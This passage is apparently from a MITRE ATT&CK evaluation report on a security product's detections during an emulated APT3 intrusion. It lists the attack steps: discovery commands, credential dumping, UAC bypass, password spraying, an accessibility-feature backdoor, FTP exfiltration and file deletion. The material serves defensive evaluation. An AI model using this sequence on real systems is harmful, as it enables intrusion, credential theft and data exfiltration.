Telemetry showing recycler.exe execution (tainted by a parent PowerShell alert)
19.C.1
Empire: Sequence of 'echo' commands via PowerShell to populate commands in text file (ftp.txt), which is then executed by FTP to exfil data through network connection separate of existing C2 channel
Exfiltration Over Alternative Protocol
(T1048)
Enrichment (Tainted)
  
 
The capability enriched ftp.exe execution with a related ATT&CK Tactic (Command and Control) and Techniques (Commonly Used Port, Standard Application Layer Protocol). The data was tainted by a parent PowerShell alert.
Telemetry
  
Telemetry showed the execution of ftp.exe and command-line arguments. The telemetry behind each enrichment is separately available in the capability. This is counted as a separate detection because the functionality was showed to MITRE throughout the evaluation, though a screenshot was not taken in this instance.
Enrichment of ftp.exe execution in process tree with related ATT&CK Tactic (Command and Control) and Techniques (Commonly Used Port, Standard Application Layer Protocol) (tainted by a parent PowerShell alert)
Continuation of enrichment of ftp.exe execution in process tree showing command-line arguments
Enrichment of ftp.exe execution with related ATT&CK Tactic (Command and Control) and Techniques (Commonly Used Port, Standard Application Layer Protocol) (tainted by a parent PowerShell alert)
Continuation of enrichment of ftp.exe execution showing total number of bytes transmitted
19.D.1
Empire: 'del C:\"$"Recycle.bin\old.rar'
File Deletion
(T1107)
Telemetry (Tainted)
  
 
Telemetry showed a deletion event for old.rar via powershell.exe. The telemetry was tainted by a parent PowerShell alert listed as the owner process.
Telemetry showing a deletion event for old.rar via powershell.exe (tainted by a parent PowerShell alert, listed as Owner process)
19.D.2
Empire: 'del recycler.exe'
File Deletion
(T1107)
Telemetry (Tainted)
  
 
Telemetry showed a deletion event for recycler.exe via powershell.exe. The telemetry was tainted by a parent PowerShell alert listed as the owner process.
Telemetry showing a deletion event for recycler.exe via powershell.exe (tainted by a parent PowerShell alert, listed as Owner process)
20.A.1
magnifer.exe previously overwritten by cmd.exe launched through RDP connection made to Creeper (10.0.0.4)
Accessibility Features
(T1015)
Specific Behavior
  
A Specific Behavior alert was generated based on a new process masquerading as a Windows accessibility feature, mapped to the correct ATT&CK Tactic (Persistence) and Technique (Accessibility Features).
Telemetry
  
Telemetry showed the execution of magnify.exe. For most alerts in the user interface, the telemetry behind it is separately available in the capability. This is counted as a separate detection because the functionality was showed to MITRE throughout the evaluation, though a screenshot was not taken in this instance.
Specific Behavior alert for magnify.exe masquerading as a Windows accessibility feature, mapped to the correct ATT&CK Tactic (Persistence) and Technique (Accessibility Features)
Specific Behavior alert for magnify.exe, in process tree, masquerading as a Windows accessibility feature, mapped to the correct ATT&CK Tactic (Persistence) and Technique (Accessibility Features)
Remote Desktop Protocol
(T1076)
Enrichment
  
The capability enriched a RDP connection with information that the connection was made to a RDP port, as well as a related ATT&CK Tactic (Command and Control) and Techniques (Commonly Used Port, Standard Application Layer Protocol).
Telemetry
  
Telemetry showed creation of a RDP session on Creeper (10.0.0.4).
Enrichment of RDP connection to Creeper (10.0.0.4) identified as using RDP Port and related ATT&CK Tactic (Command and Control) and Technique (Commonly Used Port, Standard Application Layer Protocol)
Telemetry of connection to port 3389 on Creeper (10.0.0.4)
20.B.1
Executed 'whoami' via cmd persistence mechanism through RDP connection made to Creeper (10.0.0.4)
System Owner / User Discovery
(T1033)
Specific Behavior (Tainted)
  
 
A Specific Behavior alert was generated based on whoami.exe performing Reconnaissance as a SYSTEM user. The alert was tagged with the correct ATT&CK Tactic (Discovery) and Technique (System Owner/User Discovery). The alert was tainted by a parent Accessibility Features alert.
Telemetry
  
Telemetry showed the execution of whoami.exe. For most alerts in the user interface, the telemetry behind it is separately available in the capability. This is counted as a separate detection because the functionality was showed to MITRE throughout the evaluation, though a screenshot was not taken in this instance.
Specific Behavior alert for whoami.exe execution with the correct ATT&CK Tactic (Discovery) and Technique (System Owner/User Discovery) (tainted by a parent Accessibility Features alert)







Operational Flow The Operational Flow panel provides the context around when a procedure was executed by showing all steps of the evaluation, including the tactics, techniques and procedures of the executed steps.

Step 1: Initial Compromise

1.A.1 Execution

User Execution, Rundll32, Scripting

i. Legitimate user Debbie clicked and executed malicious self-extracting archive (Resume Viewer.exe) on 10.0.1.6 (Nimda)

1.B.1 Persistence

Registry Run Keys / Startup Folder

i. Previously executed batch file (pdfhelper.cmd) moved a separate batch file (autoupdate.bat) to the Startup folder

1.C.1 Command and Control

Commonly Used Port, Data Encoding, Standard Application Layer Protocol

i. Cobalt Strike: C2 channel established

Step 2: Initial Discover

2.A.1 Discovery

System Network Configuration Discovery

i. Cobalt Strike: 'ipconfig /all' via cmd

2.A.2 Discovery

System Network Configuration Discovery

i. Cobalt Strike: 'arp -a' via cmd

2.B.1 Discovery

System Owner / User Discovery

i. Cobalt Strike: 'echo' via cmd to enumerate specific environment variables

2.C.1 Discovery

Process Discovery

i. Cobalt Strike: 'ps' (Process status) via Win32 APIs

2.C.2 Discovery

Process Discovery

i. Cobalt Strike: 'tasklist /v' via cmd

2.D.1 Discovery

System Service Discovery

i. Cobalt Strike: 'sc query' via cmd

2.D.2 Discovery

System Service Discovery

i. Cobalt Strike: 'net start' via cmd

2.E.1 Discovery

System Information Discovery

i. Cobalt Strike: 'systeminfo' via cmd

2.E.2 Discovery

System Information Discovery

i. Cobalt Strike: 'net config workstation' via cmd

2.F.1 Discovery

Permission Groups Discovery

i. Cobalt Strike: 'net localgroup administrators' via cmd

2.F.2 Discovery

Permission Groups Discovery

i. Cobalt Strike: 'net localgroup administrators /domain' via cmd

2.F.3 Discovery

Permission Groups Discovery

i. Cobalt Strike: 'net group "Domain Admins" /domain' via cmd

2.G.1 Discovery

Account Discovery

i. Cobalt Strike: 'net user /domain' via cmd

2.G.2 Discovery

Account Discovery

i. Cobalt Strike: 'net user george /domain' via cmd

2.H.1 Discovery

Query Registry

i. Cobalt Strike: 'reg query' via cmd to enumerate a specific Registry key

Step 3: Privilege Escalation

3.A.1 Defense Evasion, Privilege Escalation

Access Token Manipulation, Bypass User Account Control

i. Cobalt Strike: Built-in UAC bypass token duplication capability executed to elevate process integrity level

3.B.1 Discovery

Process Discovery

i. Cobalt Strike: 'ps' (Process status) via Win32 APIs

3.C.1 Defense Evasion, Privilege Escalation

Process Injection

i. Cobalt Strike: Built-in process injection capability executed to inject callback into cmd.exe

Step 4: Discovery for Lateral Movement

4.A.1 Discovery

Remote System Discovery

i. Cobalt Strike: 'net group "Domain Controllers" /domain' via cmd

4.A.2 Discovery

Remote System Discovery

i. Cobalt Strike: 'net group "Domain Computers" /domain' via cmd

4.B.1 Discovery

System Network Configuration Discovery

i. Cobalt Strike: 'netsh advfirewall show allprofiles' via cmd

4.C.1 Discovery

System Network Connections Discovery

i. Cobalt Strike: 'netstat -ano' via cmd

Step 5: Credential Access

5.A.1 Credential Access

Credential Dumping, Process Injection

i. Cobalt Strike: Built-in Mimikatz credential dump capability executed

5.A.2 Credential Access

Credential Dumping, Process Injection

i. Cobalt Strike: Built-in hash dump capability executed

5.B.1 Defense Evasion, Privilege Escalation

Access Token Manipulation

i. Cobalt Strike: Built-in token theft capability executed to change user context to George

Step 6: Lateral Movement

6.A.1 Discovery

Query Registry

i. Cobalt Strike: 'reg query' via cmd to remotely enumerate a specific Registry key on Conficker (10.0.0.5)

6.B.1 Command and Control

Commonly Used Port, Multiband Communication, Standard Application Layer Protocol

i. Cobalt Strike: C2 channel modified

6.C.1 Lateral Movement

Remote Desktop Protocol

i. Cobalt Strike: C2 channel modified to proxy RDP connection to Conficker (10.0.0.5)

Step 7: Persistence

7.A.1 Persistence

Create Account, Graphical User Interface, Account Discovery

i. Added user Jesse to Conficker (10.0.0.5) through RDP connection

7.B.1 Command and Control, Lateral Movement

Remote File Copy

i. Cobalt Strike: Built-in upload capability executed to write a DLL payload (updater.dll) to disk on Nimda (10.0.1.6)

7.C.1 Execution, Persistence, Privilege Escalation

Scheduled Task

i. Cobalt Strike: 'schtasks' via cmd to create scheduled task that executes a DLL payload (updater.dll)

Step 8: Collection

8.A.1 Discovery

File and Directory Discovery

i. Cobalt Strike: 'dir /s /b "\\conficker\wormshare"' via cmd

8.A.2 Discovery

File and Directory Discovery

i. Cobalt Strike: 'tree "C:\Users\debbie"' via cmd

8.B.1 Discovery

Process Discovery

i. Cobalt Strike: 'ps' (Process status) via Win32 APIs

8.C.1 Collection, Credential Access

Input Capture, Application Window Discovery

i. Cobalt Strike: Built-in keylogging capability executed to capture keystrokes of user Debbie

8.D.1 Collection

Screen Capture, Process Injection

i. Cobalt Strike: Built-in screen capture capability executed to capture screenshot of current window of user Debbie

Step 9: Exfiltration

9.A.1 Discovery

File and Directory Discovery

i. Cobalt Strike: 'ls' (List) via Win32 APIs to enumerate a network shared drive (Wormshare) on Conficker (10.0.0.5)

9.B.1 Collection

Data from Network Shared Drive, Exfiltration Over Command and Control Channel

i. Cobalt Strike: Built-in download capability executed to a collect file (Shockwave_rackb_diagram.vsdx) from a network shared drive (Wormshare) on Conficker (10.0.0.5)

Step 10: Execution of Persistence

10.A.1 Persistence

Registry Run Keys / Startup Folder

i. Batch file (autoupdate.bat) previously written to Startup folder executed when user Debbie logs on to Nimda (10.0.1.6), launching a DLL payload (update.dat) using Rundll32

10.A.2 Execution, Persistence, Privilege Escalation

Scheduled Task

i. Scheduled task executed when user Debbie logs on to Nimda (10.0.1.6), launching a DLL payload (updater.dll) using Rundll32

10.B.1 Lateral Movement

Remote Desktop Protocol, Valid Accounts

i. RDP connection to Conficker (10.0.0.5) authenticated using previously added user Jesse

Step 11: Initial Access

11.A.1 Defense Evasion, Execution

Scripting

i. Legitimate user Bob clicked and executed malicious VBScript (autoupdate.vbs) on 10.0.1.5 (CodeRed)

11.B.1 Command and Control

Commonly Used Port, Standard Application Layer Protocol, Standard Cryptographic Protocol

i. Empire: C2 channel established

Step 12: Initial Discover

12.A.1 Discovery

System Network Configuration Discovery

i. Empire: 'route print' via PowerShell

12.A.2 Discovery

System Network Configuration Discovery

i. Empire: 'ipconfig /all' via PowerShell

12.B.1 Discovery

System Owner / User Discovery

i. Empire: 'whoami /all /fo list' via PowerShell

12.C.1 Discovery

Process Discovery

i. Empire: 'qprocess *' via PowerShell

12.D.1 Discovery

System Service Discovery

i. Empire: 'net start' via PowerShell

12.E.1 Defense Evasion, Execution

Scripting

i. Empire: Built-in WinEnum module executed to programmatically execute a series of enumeration techniques

12.E.1.1 Discovery

System Owner / User Discovery

i. Empire: WinEnum module included enumeration of user information

12.E.1.2 Discovery

Permission Groups Discovery

i. Empire: WinEnum module included enumeration of AD group memberships

12.E.1.3 Discovery

Password Policy Discovery

i. Empire: WinEnum module included enumeration of password policy information

12.E.1.4.1 Discovery

File and Directory Discovery

i. Empire: WinEnum module included enumeration of recently opened files

12.E.1.4.2 Discovery

File and Directory Discovery

i. Empire: WinEnum module included enumeration of interesting files

12.E.1.5 Collection

Clipboard Data

i. Empire: WinEnum module included enumeration of clipboard contents

12.E.1.6.1 Discovery

System Information Discovery

i. Empire: WinEnum module included enumeration of system information

12.E.1.6.2 Discovery

System Information Discovery

i. Empire: WinEnum module included enumeration of Windows update information

12.E.1.7 Discovery

Query Registry

i. Empire: WinEnum module included enumeration of system information via a Registry query

12.E.1.8 Discovery

System Service Discovery

i. Empire: WinEnum module included enumeration of services

12.E.1.9.1 Discovery

Network Share Discovery

i. Empire: WinEnum module included enumeration of available shares

12.E.1.9.2 Discovery

Network Share Discovery

i. Empire: WinEnum module included enumeration of mapped network drives

12.E.1.10.1 Discovery

Security Software Discovery

i. Empire: WinEnum module included enumeration of AV solutions

12.E.1.10.2 Discovery

Security Software Discovery

i. Empire: WinEnum module included enumeration of firewall rules

12.E.1.11 Discovery

System Network Configuration Discovery

i. Empire: WinEnum module included enumeration of network adapters

12.E.1.12 Discovery

System Network Connections Discovery

i. Empire: WinEnum module included enumeration of established network connections

12.F.1 Discovery

Permission Groups Discovery

i. Empire: 'net group "Domain Admins" /domain' via PowerShell

12.F.2 Discovery

Permission Groups Discovery

i. Empire: 'net localgroup administrators' via PowerShell

12.G.1 Discovery

Account Discovery

i. Empire: 'net user' via PowerShell

12.G.2 Discovery

Account Discovery

i. Empire: 'net user /domain' via PowerShell

Step 13: Discovery for Lateral Movement

13.A.1 Discovery

Remote System Discovery

i. Empire: 'net group "Domain Computers" /domain' via PowerShell

13.B.1 Discovery

System Network Connections Discovery

i. Empire: 'net use' via PowerShell

13.B.2 Discovery

System Network Connections Discovery

i. Empire: 'netstat -ano' via PowerShell

13.C.1 Discovery

Query Registry

i. Empire: 'reg query' via PowerShell to enumerate a specific Registry key

Step 14: Privilege Escalation

14.A.1 Defense Evasion, Privilege Escalation

Bypass User Account Control, Commonly Used Port, Remote File Copy, Standard Application Layer Protocol

i. Empire: UAC bypass module downloaded and executed a new Empire stager (wdbypass)

Step 15: Credential Access

15.A.1 Discovery

Application Window Discovery, Input Capture

i. Empire: Built-in keylogging module executed to capture keystrokes of user Bob

15.B.1 Credential Access

Credentials in Files

i. Empire: 'get-content' via PowerShell to collect sensitive file (it_tasks.txt) from a network shared drive (Wormshare) on Conficker (10.0.0.5)

Step 16: Lateral Movement

16.A.1 Credential Access

Brute Force, Windows Admin Shares

i. Empire: 'net use' via PowerShell to brute force password spraying authentication attempts to Morris (10.0.1.4) and Nimda (10.0.1.6) targeting credentials of users Kmitnick, Bob, and Frieda

16.B.1 Lateral Movement

Windows Admin Shares, Valid Accounts, Brute Force

i. Empire: 'net use' via PowerShell to successfully authenticate to Conficker (10.0.0.5) using credentials of user Kmitnick

16.C.1 Defense Evasion

Network Share Connection Removal

i. Empire: 'net use /delete' via PowerShell

16.D.1 Lateral Movement

Windows Admin Shares, Valid Accounts

i. Empire: Successful authentication targeted Windows admin shares on Conficker (10.0.0.5)

16.E.1 Command and Control, Lateral Movement

Remote File Copy

i. Empire: Built-in upload module executed to write malicious VBScript (autoupdate.vbs) to disk on CodeRed (10.0.1.5)

16.F.1 Execution

Command-Line Interface

i. Empire: Built-in runas module executed to launch malicious VBScript (autoupdate.vbs) as user Kmitnick

16.G.1 Command and Control, Lateral Movement

Remote File Copy

i. Empire: Built-in move capability executed to write malicious VBScript (update.vbs) to disk on Creeper (10.0.0.4)

16.H.1 Discovery

System Service Discovery

i. Empire: 'sc query' via PowerShell to remotely enumerate services on Creeper (10.0.0.4)

16.I.1 Persistence, Privilege Escalation

New Service, Masquerading

i. Empire: 'sc create' via PowerShell to remotely create a service on Creeper (10.0.0.4)

16.J.1 Discovery

System Service Discovery

i. Empire: 'sc qc' via PowerShell to remotely enumerate a specific service on Creeper (10.0.0.4)

16.K.1 Discovery

File and Directory Discovery

i. Empire: 'type' via PowerShell to remotely enumerate a specific file (update.vbs) on Creeper (10.0.0.4)

16.L.1 Execution

Service Execution

i. Empire: 'sc start' via PowerShell to remotely launch a specific service on Creeper (10.0.0.4)

Step 17: Persistence

17.A.1 Discovery

System Service Discovery, Query Registry

i. Empire: 'reg query' via PowerShell to enumerate a specific Registry key associated with terminal services

17.B.1 Defense Evasion

File Permissions Modification

i. Empire: 'takeown' via PowerShell to obtain ownership of magnify.exe

17.B.2 Defense Evasion

File Permissions Modification

i. Empire: 'icacls' via PowerShell to modify the DACL for magnify.exe

17.C.1 Persistence, Privilege Escalation

Accessibility Features

i. Empire: 'copy' via PowerShell to overwrite magnify.exe with cmd.exe

Step 18: Collection

18.A.1 Discovery

File and Directory Discovery

i. Empire: 'Get-ChildItem' via PowerShell to enumerate a network shared drive (Wormshare) on Conficker (10.0.0.5)

18.B.1 Collection

Data Staged, Data from Network Shared Drive

i. Empire: 'copy' via PowerShell staged a file (Shockwave_network.vsdx) from a network shared drive (Wormshare) on Conficker (10.0.0.5) in the Recycle Bin (C:\$Recycle.Bin) on CodeRed (10.0.1.5)

Step 19: Exfiltration

19.A.1 Defense Evasion

Masquerading, Remote File Copy

i. Empire: File dropped to disk is a renamed copy of the WinRAR binary

19.B.1 Exfiltration

Data Compressed, Data Encrypted, Masquerading

i. Empire: Executed binary (recycler.exe) created compressed archive (old.rar) of previously collected file

19.C.1 Exfiltration

Exfiltration Over Alternative Protocol

i. Empire: Sequence of 'echo' commands via PowerShell to populate commands in text file (ftp.txt), which is then executed by FTP to exfil data through network connection separate of existing C2 channel

19.D.1 Defense Evasion

File Deletion

i. Empire: 'del C:\"$"Recycle.bin\old.rar'

19.D.2 Defense Evasion

File Deletion

i. Empire: 'del recycler.exe'

Step 20: Execution of Persistence

20.A.1 Persistence, Privilege Escalation

Accessibility Features, Remote Desktop Protocol

i. magnifer.exe previously overwritten by cmd.exe launched through RDP connection made to Creeper (10.0.0.4)

20.B.1 Discovery

System Owner / User Discovery

i. Executed 'whoami' via cmd persistence mechanism through RDP connection made to Creeper (10.0.0.4)